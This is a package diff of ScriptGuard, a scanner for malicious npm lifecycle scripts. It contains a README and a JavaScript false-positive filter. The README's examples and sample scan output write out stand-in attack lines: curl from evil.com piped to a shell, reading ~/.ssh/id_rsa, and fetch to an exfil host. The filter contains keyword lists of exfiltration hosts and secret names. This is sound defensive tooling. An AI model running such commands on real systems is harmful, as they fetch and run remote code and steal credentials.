scriptguard 1.0.0

package/README.md

@@ -0,0 +1,430 @@
+# ScriptGuard 🔒
+
+[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
+[![Build Status](https://img.shields.io/badge/build-passing-brightgreen)](https://github.com/ferrierepete/scriptguard)
+[![Node.js Version](https://img.shields.io/node/v/scriptguard.svg)](https://nodejs.org)
+
+> **Security scanner for npm package lifecycle scripts** — detect malicious `postinstall`, `preinstall`, and `prepare` scripts before they run.
+
+npm supply chain attacks often hide in lifecycle scripts — code that runs automatically during `npm install`. ScriptGuard scans installed packages and flags dangerous patterns like remote code execution, credential theft, data exfiltration, and obfuscated payloads.
+
+## Install
+
+### Option 1: Install from source (current)
+
+```bash
+# Clone the repository
+git clone https://github.com/ferrierepete/scriptguard.git
+cd scriptguard
+
+# Install dependencies
+npm install
+
+# Build the project
+npm run build
+
+# Install globally
+npm link
+```
+
+### Option 2: Run directly without installation
+
+```bash
+# Clone and run
+git clone https://github.com/ferrierepete/scriptguard.git
+cd scriptguard
+npm install
+npm run build
+node dist/cli.js scan
+```
+
+### Option 3: Install via npm (coming soon)
+
+```bash
+# Package will be published to npm soon
+npm install -g scriptguard
+```
+
+> **Note**: This project is currently in development. To use it today, install from source using Option 1 or Option 2.
+
+## Usage
+
+### Scan your project
+
+```bash
+# Scan all installed packages for malicious lifecycle scripts
+scriptguard scan
+
+# Scan a specific project path
+scriptguard scan --path /path/to/project
+
+# Output as JSON for CI pipelines
+scriptguard scan --format json
+
+# Fail CI if high/critical findings found
+scriptguard scan --fail-on high
+
+# SARIF output for GitHub Advanced Security
+scriptguard scan --format sarif
+```
+
+### Check a single package.json
+
+```bash
+scriptguard check ./package.json
+scriptguard check ./some-module/package.json --format json
+```
+
+### List all detection patterns
+
+```bash
+scriptguard patterns
+```
+
+### AI-Powered Analysis (Optional)
+
+ScriptGuard can use Google Gemini AI to enhance security scans with contextual analysis:
+
+```bash
+# Enable AI analysis
+export GOOGLE_AI_API_KEY=your_key_here
+scriptguard scan --ai
+
+# Choose analysis depth
+scriptguard scan --ai --ai-mode basic    # Quick false positive filtering
+scriptguard scan --ai --ai-mode standard  # Full analysis (default)
+scriptguard scan --ai --ai-mode thorough # Deep analysis with correlation
+
+# Control costs and timeouts
+scriptguard scan --ai --ai-max-tokens 500 --ai-timeout 5000
+
+# Include remediation recommendations
+scriptguard scan --ai --ai-mitigation
+```
+
+**What AI adds:**
+- ✅ **Reduces false positives** by understanding context (e.g., `process.env.PORT` vs `process.env.AWS_SECRET_KEY`)
+- ✅ **Detects advanced threats** like obfuscated code, novel attack patterns, and multi-stage attacks
+- ✅ **Provides actionable insights** with attack technique identification and remediation guidance
+
+**Get an API key:**
+1. Visit https://makersuite.google.com/app/apikey
+2. Create a new API key (free tier available)
+3. Set as environment variable: `export GOOGLE_AI_API_KEY=your_key`
+
+**Model & Pricing:**
+- **Model**: `gemini-3-flash-preview` (fast, cost-effective)
+- **Estimated cost**: ~$0.00002 per 100 packages (based on ~2,000 tokens/scan)
+- **Actual test results**:
+  - Basic mode: 405 tokens (~$0.000004)
+  - Standard mode: 1,640 tokens (~$0.000016)
+  - Thorough mode: ~2,500 tokens (~$0.000025)
+
+⚠️ **Pricing varies by region and usage tier**. For current pricing, see:
+- [Gemini 3 Documentation](https://ai.google.dev/gemini-api/docs/gemini-3)
+- [Gemini Pricing](https://ai.google.dev/pricing)
+
+**Cost control tips:**
+- Use `--ai-mode basic` for CI/CD (4x cheaper)
+- Set `--ai-max-tokens` to limit usage per scan
+- Results are cached for 24 hours (same packages = free rescan)
+
+## What It Detects
+
+ScriptGuard uses 26 detection patterns across 6 categories:
+
+| Category | Examples |
+|----------|---------|
+| **Network** | `curl \| bash`, silent HTTP requests, DNS exfiltration |
+| **Execution** | `eval()`, `child_process`, shell exec, `node -e` |
+| **Filesystem** | SSH key access, AWS credential reading, `/etc/passwd` access |
+| **Exfiltration** | `process.env` reads, clipboard access, keychain access |
+| **Obfuscation** | base64 decode + eval, hex-encoded payloads |
+| **Crypto** | Cryptocurrency miners, reverse shells |
+
+## Output Formats
+
+- **Table** (default) — human-readable terminal output with risk scores
+- **JSON** — structured data for tooling integration
+- **SARIF** — GitHub Advanced Security compatible format
+
+## CI/CD Integration
+
+### When published to npm (coming soon)
+
+```yaml
+# GitHub Actions
+- name: ScriptGuard Security Scan
+  run: npx scriptguard scan --fail-on high --format sarif > scriptguard-results.sarif
+```
+
+### Installing from source (current)
+
+```yaml
+# GitHub Actions
+- name: ScriptGuard Security Scan
+  run: |
+    git clone https://github.com/ferrierepete/scriptguard.git
+    cd scriptguard
+    npm install
+    npm run build
+    node dist/cli.js scan --fail-on high --format sarif > scriptguard-results.sarif
+```
+
+## Programmatic API
+
+```typescript
+import { scanProject, analyzePackage } from 'scriptguard';
+
+// Scan an entire project
+const result = scanProject({ path: '.', includeDev: false, minRiskLevel: 'low', format: 'table' });
+console.log(`Found ${result.totalFindings} findings`);
+
+// Analyze a single package's scripts
+const analysis = analyzePackage('my-pkg', '1.0.0', { postinstall: 'curl http://evil.com | sh' });
+console.log(analysis.riskLevel); // 'critical'
+```
+
+## Why This Exists
+
+- **824+ malicious OpenClaw skills** were found on ClawHub (20% contamination rate)
+- **pino-SDK-v2** exfiltrated `.env` secrets to Discord via postinstall
+- **Shai-Hulud** supply chain attack compromised hundreds of npm packages
+- `npm audit` only checks for known CVEs — not malicious behavior patterns
+- No dedicated tool existed for scanning lifecycle scripts
+
+## Tech Stack
+
+- TypeScript, Node.js 18+
+- Commander.js (CLI), Zod (validation)
+- Optional AI: Google Gemini API (requires `GOOGLE_AI_API_KEY`)
+- Zero runtime dependencies beyond CLI framework
+
+## Example Output
+
+```bash
+$ scriptguard scan
+
+  🔒 ScriptGuard — npm Lifecycle Script Security Scanner
+
+  Scanned 156 packages (42 with lifecycle scripts) in 23ms
+
+  Summary
+  Overall Risk: HIGH (52/100)
+  Findings: 8 total — 🔴 2 critical | 🟠 3 high | 🟡 2 medium | ⚪ 1 low
+
+  Findings
+  ──────────────────────────────────────────────────────────────────────
+
+  suspicious-package@2.1.0 🔴 CRITICAL [85/100]
+    🔴 CRITICAL curl-pipe
+      Downloads and executes remote code via curl pipe
+      Match: curl -s https://evil.com/payload.sh | bash
+
+    🔴 CRITICAL ssh-access
+      Accesses SSH keys — credential theft risk
+      Match: cat ~/.ssh/id_rsa
+
+  data-exfil@1.0.3 🟠 HIGH [65/100]
+    🟠 HIGH env-exfil
+      Reads environment variables — may contain secrets
+      Match: process.env
+
+    🟠 HIGH http-request
+      Outbound HTTP request detected
+      Match: fetch('https://exfil.com/data')
+
+  ──────────────────────────────────────────────────────────────────────
+```
+
+## Performance
+
+ScriptGuard is optimized for speed:
+
+### Regex-Only Scanning (Default)
+
+| Project Size | Packages | Scan Time |
+|--------------|----------|-----------|
+| Small | < 50 | ~5-15ms |
+| Medium | 50-200 | ~15-40ms |
+| Large | 200-1000 | ~40-150ms |
+| Monorepo | 1000+ | ~150-500ms |
+
+**Why so fast?**
+- Single-pass file system traversal
+- No network requests during scanning
+- Regex-based pattern matching (compiled at startup)
+- Parallel-friendly architecture
+
+### AI-Enabled Scanning (with `--ai`)
+
+| Mode | Time (100 pkgs) | Tokens | Cost |
+|------|-----------------|--------|------|
+| Basic | +25s | 405 | ~$0.000004 |
+| Standard | +30s | 1,640 | ~$0.000016 |
+| Thorough | +35s | ~2,500 | ~$0.000025 |
+
+**AI performance notes:**
+- Times are **additional** to regex scanning
+- Actual results from real scans (78 packages)
+- Token usage varies by package complexity
+- 24-hour response caching (same packages = instant)
+- See [Gemini 3 Pricing](https://ai.google.dev/gemini-api/docs/gemini-3) for current rates
+
+## FAQ
+
+### Does ScriptGuard execute any code from packages?
+
+**No.** ScriptGuard only reads `package.json` files and analyzes script contents as strings. It never executes, requires, or runs code from scanned packages.
+
+### What about false positives?
+
+Some legitimate packages use lifecycle scripts for build steps, binaries, or platform-specific installations. ScriptGuard flags these as **LOW** risk with the pattern `lifecycle-script-present`. Review these manually to decide if they're safe for your environment.
+
+### Can I suppress specific findings?
+
+Not currently. If you have legitimate use cases that trigger warnings, consider:
+1. Using `--min-risk high` to filter out low/medium findings
+2. Adding package-specific exclusions in your CI pipeline
+3. Contributing a `.scriptguardignore` feature request!
+
+### How does this differ from `npm audit`?
+
+| | npm audit | ScriptGuard |
+|---|-----------|-------------|
+| What it checks | Known CVEs in dependencies | Malicious behavior patterns |
+| Detection method | Vulnerability database | Static code analysis |
+| What it catches | Outdated versions with known exploits | Zero-day attacks, obfuscated code |
+| Scope | All dependency code | Lifecycle scripts only |
+
+Use them together for comprehensive coverage.
+
+### Should I run this in CI?
+
+**Absolutely.** Add ScriptGuard to your CI pipeline to catch supply chain attacks before they reach production:
+
+```yaml
+# When published to npm (coming soon)
+- name: Run ScriptGuard
+  run: npx scriptguard scan --fail-on high
+
+# Installing from source (current)
+- name: Run ScriptGuard
+  run: |
+    git clone https://github.com/ferrierepete/scriptguard.git
+    cd scriptguard
+    npm install
+    npm run build
+    node dist/cli.js scan --fail-on high
+```
+
+## Troubleshooting
+
+### "No node_modules found"
+
+ScriptGuard expects to run in a directory with a `node_modules` folder. If you're in a monorepo or using a different structure:
+```bash
+scriptguard scan --path ./packages/frontend
+```
+
+### High memory usage on large projects
+
+If scanning 1000+ packages causes memory issues:
+```bash
+# Scan individual package directories
+scriptguard scan --path ./node_modules/package-name
+```
+
+### Permission errors reading package.json
+
+Some packages have restricted file permissions. ScriptGuard will skip these and continue scanning other packages. Check your file system permissions if you see many skipped packages.
+
+## Development
+
+Want to contribute or hack on ScriptGuard?
+
+```bash
+# Clone the repo
+git clone https://github.com/ferrierepete/scriptguard.git
+cd scriptguard
+
+# Install dependencies
+npm install
+
+# Run tests
+npm test
+
+# Watch mode for development
+npm run test:watch
+
+# Build TypeScript
+npm run build
+
+# Run locally (before publishing)
+npm link
+scriptguard scan
+```
+
+### Project Structure
+
+```
+scriptguard/
+├── src/
+│   ├── cli.ts              # Commander.js CLI entry point
+│   ├── index.ts            # Public API exports
+│   ├── types/
+│   │   └── index.ts        # TypeScript definitions
+│   └── scanners/
+│       ├── index.ts        # Scan orchestration
+│       ├── lifecycle.ts    # package.json parsing
+│       └── patterns.ts     # 26 detection rules
+├── tests/
+│   ├── scanner.test.ts     # Vitest test suite
+│   └── fixtures/           # Sample package.json files
+└── dist/                   # Compiled JavaScript (generated)
+```
+
+### Adding New Detection Patterns
+
+Edit `src/scanners/patterns.ts` and add to the `PATTERN_RULES` array:
+
+```typescript
+{
+  name: 'your-pattern',
+  pattern: /your-regex-here/,
+  riskLevel: 'high',  // or 'critical', 'medium', 'low'
+  description: 'What this pattern detects',
+  category: 'network',  // or 'execution', 'filesystem', etc.
+}
+```
+
+Then add tests in `tests/scanner.test.ts`.
+
+## Contributing
+
+Contributions are welcome! Here's how to help:
+
+1. **Report bugs** — Open an issue with reproduction steps
+2. **Suggest features** — Share your use case in Discussions
+3. **Submit patterns** — Add new detection rules (see above)
+4. **Improve docs** — Fix typos, clarify examples
+5. **Fix bugs** — Pull requests welcome!
+
+See [CONTRIBUTING.md](CONTRIBUTING.md) for detailed guidelines.
+
+## Resources
+
+- **GitHub Repository**: https://github.com/ferrierepete/scriptguard
+- **Report Issues**: https://github.com/ferrierepete/scriptguard/issues
+- **Discussions**: https://github.com/ferrierepete/scriptguard/discussions
+- **npm Package** (coming soon): Will be published at https://www.npmjs.com/package/scriptguard
+
+## Related Tools
+
+- [npm audit](https://docs.npmjs.com/cli/v8/commands/npm-audit) — Official vulnerability scanner
+- [snyk](https://snyk.io/) — Dependency vulnerability monitoring
+- [lockfile-lint](https://github.com/lirantal/lockfile-lint) — Lockfile policy enforcement
+
+## License
+
+MIT © [Peter Ferriere](https://github.com/ferrierepete)

package/dist/ai/analyzers/false-positive-filter.d.ts

@@ -0,0 +1,15 @@
+/** ScriptGuard — False positive filter analyzer */
+import type { PackageAnalysis, Finding, AIInsight } from '../../types/index.js';
+/**
+ * Analyze findings to identify false positives
+ * This is a lightweight analyzer that works in conjunction with AI analysis
+ */
+export declare function analyzeFalsePositives(analysis: PackageAnalysis, aiInsights: AIInsight[]): {
+    filteredFindings: Finding[];
+    falsePositivesFiltered: number;
+};
+/**
+ * Calculate confidence score for false positive determination
+ */
+export declare function getFalsePositiveConfidence(finding: Finding, analysis: PackageAnalysis): number;
+//# sourceMappingURL=false-positive-filter.d.ts.map

package/dist/ai/analyzers/false-positive-filter.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"false-positive-filter.d.ts","sourceRoot":"","sources":["../../../src/ai/analyzers/false-positive-filter.ts"],"names":[],"mappings":"AAAA,mDAAmD;AAEnD,OAAO,KAAK,EAAE,eAAe,EAAE,OAAO,EAAE,SAAS,EAAE,MAAM,sBAAsB,CAAC;AAEhF;;;GAGG;AACH,wBAAgB,qBAAqB,CACnC,QAAQ,EAAE,eAAe,EACzB,UAAU,EAAE,SAAS,EAAE,GACtB;IACD,gBAAgB,EAAE,OAAO,EAAE,CAAC;IAC5B,sBAAsB,EAAE,MAAM,CAAC;CAChC,CAyBA;AA6HD;;GAEG;AACH,wBAAgB,0BAA0B,CAAC,OAAO,EAAE,OAAO,EAAE,QAAQ,EAAE,eAAe,GAAG,MAAM,CA0B9F"}

package/dist/ai/analyzers/false-positive-filter.js

@@ -0,0 +1,162 @@
+"use strict";
+/** ScriptGuard — False positive filter analyzer */
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.analyzeFalsePositives = analyzeFalsePositives;
+exports.getFalsePositiveConfidence = getFalsePositiveConfidence;
+/**
+ * Analyze findings to identify false positives
+ * This is a lightweight analyzer that works in conjunction with AI analysis
+ */
+function analyzeFalsePositives(analysis, aiInsights) {
+    const filteredFindings = [];
+    let falsePositivesFiltered = 0;
+    // Get AI-identified false positives
+    const aiFalsePositives = new Set(aiInsights
+        .filter(insight => insight.type === 'false-positive')
+        .map(insight => insight.description));
+    for (const finding of analysis.findings) {
+        const isFalsePositive = isLikelyFalsePositive(finding, analysis);
+        if (isFalsePositive || aiMatchesFinding(finding, aiFalsePositives)) {
+            falsePositivesFiltered++;
+        }
+        else {
+            filteredFindings.push(finding);
+        }
+    }
+    return {
+        filteredFindings,
+        falsePositivesFiltered,
+    };
+}
+/**
+ * Rule-based false positive detection
+ * Works independently of AI to catch obvious cases
+ */
+function isLikelyFalsePositive(finding, analysis) {
+    const { pattern, scriptContent, scriptName } = finding;
+    // Known safe patterns in specific contexts
+    // 1. child_process for build tools (esbuild, webpack, vite, etc.)
+    if (pattern === 'child-process') {
+        const safeBuildTools = [
+            'esbuild', 'webpack', 'vite', 'rollup', 'tsc', 'ts-node',
+            'babel', 'prebuild', 'postbuild', 'node-gyp', 'node-pre-gyp',
+            'cmake', 'make', 'gyp', 'preinstall', 'npm run'
+        ];
+        const scriptLower = scriptContent.toLowerCase();
+        if (safeBuildTools.some(tool => scriptLower.includes(tool))) {
+            return true;
+        }
+    }
+    // 2. process.env for configuration (not exfiltration)
+    if (pattern === 'env-exfil') {
+        const safeEnvVars = [
+            'PORT', 'HOST', 'NODE_ENV', 'DEBUG', 'VERBOSE', 'LOG_LEVEL',
+            'CI', 'DEPLOYMENT', 'ENVIRONMENT', 'CONFIG', 'PATH',
+            'HOME', 'TMP', 'TEMP', 'USER', 'SHELL'
+        ];
+        const hasSafeEnv = safeEnvVars.some(envVar => scriptContent.includes(`process.env.${envVar}`) ||
+            scriptContent.includes(`${envVar}=`));
+        const hasSuspiciousEnv = [
+            'SECRET', 'KEY', 'TOKEN', 'PASSWORD', 'CREDENTIAL', 'AWS_',
+            'API_KEY', 'PRIVATE', 'AUTH'
+        ].some(suspicious => scriptContent.toLowerCase().includes(suspicious.toLowerCase()));
+        // Only mark as false positive if we see safe env vars but no suspicious ones
+        if (hasSafeEnv && !hasSuspiciousEnv) {
+            return true;
+        }
+    }
+    // 3. HTTP requests to well-known CDN/registry (not data exfiltration)
+    if (pattern === 'http-request' || pattern === 'curl-silent') {
+        const safeDomains = [
+            'npmjs.com', 'unpkg.com', 'cdn.jsdelivr.net', 'cdn.skypack.dev',
+            'esm.sh', 'github.com', 'raw.githubusercontent.com',
+            'registry.npmjs.org', 'registry.yarnpkg.com'
+        ];
+        const hasSafeDomain = safeDomains.some(domain => scriptContent.includes(domain));
+        const hasSuspiciousDomain = [
+            'pastebin', 'transfer.sh', 'tinyurl', 'bit.ly', 'discord',
+            'exfil', 'evil', 'malware', 'payload'
+        ].some(suspicious => scriptContent.toLowerCase().includes(suspicious));
+        if (hasSafeDomain && !hasSuspiciousDomain) {
+            return true;
+        }
+    }
+    // 4. chmod for making binaries executable (common in native modules)
+    if (pattern === 'chmod-exec') {
+        const binaryExtensions = ['.exe', '.bin', '.node', '.sh', '.bash'];
+        const hasBinary = binaryExtensions.some(ext => scriptContent.includes(ext));
+        const hasSuspiciousTarget = [
+            '/bin/bash', '/bin/sh', 'authorized_keys', 'ssh',
+            'password', 'secret', 'credential'
+        ].some(suspicious => scriptContent.toLowerCase().includes(suspicious.toLowerCase()));
+        if (hasBinary && !hasSuspiciousTarget) {
+            return true;
+        }
+    }
+    // 5. Write to temp dir for legitimate build purposes
+    if (pattern === 'tmp-write') {
+        const legitimateTempUsage = [
+            'extract', 'download', 'cache', 'build', 'compile',
+            'install', 'binary', 'artifact'
+        ];
+        const hasLegitimatePurpose = legitimateTempUsage.some(purpose => scriptContent.toLowerCase().includes(purpose));
+        const hasSuspiciousPurpose = [
+            'reverse', 'shell', 'payload', 'malware', 'evil'
+        ].some(suspicious => scriptContent.toLowerCase().includes(suspicious));
+        if (hasLegitimatePurpose && !hasSuspiciousPurpose) {
+            return true;
+        }
+    }
+    return false;
+}
+/**
+ * Check if AI identified this finding as a false positive
+ */
+function aiMatchesFinding(finding, aiFalsePositives) {
+    // Check if any AI false positive description mentions this pattern or match
+    for (const aiDesc of aiFalsePositives) {
+        if (aiDesc.toLowerCase().includes(finding.pattern.toLowerCase()) ||
+            aiDesc.toLowerCase().includes(finding.match.toLowerCase().substring(0, 50))) {
+            return true;
+        }
+    }
+    return false;
+}
+/**
+ * Calculate confidence score for false positive determination
+ */
+function getFalsePositiveConfidence(finding, analysis) {
+    let confidence = 0.5; // Base confidence
+    const { pattern, scriptContent } = finding;
+    // Higher confidence for well-known packages
+    if (isWellKnownPackage(analysis.name)) {
+        confidence += 0.2;
+    }
+    // Higher confidence if script is simple and clear
+    if (scriptContent.length < 200) {
+        confidence += 0.1;
+    }
+    // Lower confidence for complex scripts
+    if (scriptContent.length > 500) {
+        confidence -= 0.1;
+    }
+    // Lower confidence for critical patterns
+    if (finding.riskLevel === 'critical') {
+        confidence -= 0.2;
+    }
+    return Math.max(0, Math.min(1, confidence));
+}
+/**
+ * Check if package is well-known/legitimate
+ */
+function isWellKnownPackage(packageName) {
+    const knownPackages = [
+        'eslint', 'prettier', 'typescript', 'babel', 'webpack',
+        'vite', 'rollup', 'esbuild', 'jest', 'vitest', 'mocha',
+        'lodash', 'axios', 'react', 'vue', 'angular', 'svelte',
+        'express', 'koa', 'fastify', 'next', 'nuxt', 'gatsby',
+        '@types', '@babel', '@typescript', '@vue', '@angular'
+    ];
+    return knownPackages.some(known => packageName.startsWith(known));
+}
+//# sourceMappingURL=false-positive-filter.js.map

package/dist/ai/analyzers/false-positive-filter.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"false-positive-filter.js","sourceRoot":"","sources":["../../../src/ai/analyzers/false-positive-filter.ts"],"names":[],"mappings":"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"}

package/dist/ai/analyzers/insight-generator.d.ts

@@ -0,0 +1,7 @@
+/** ScriptGuard — Insight generator for actionable security guidance */
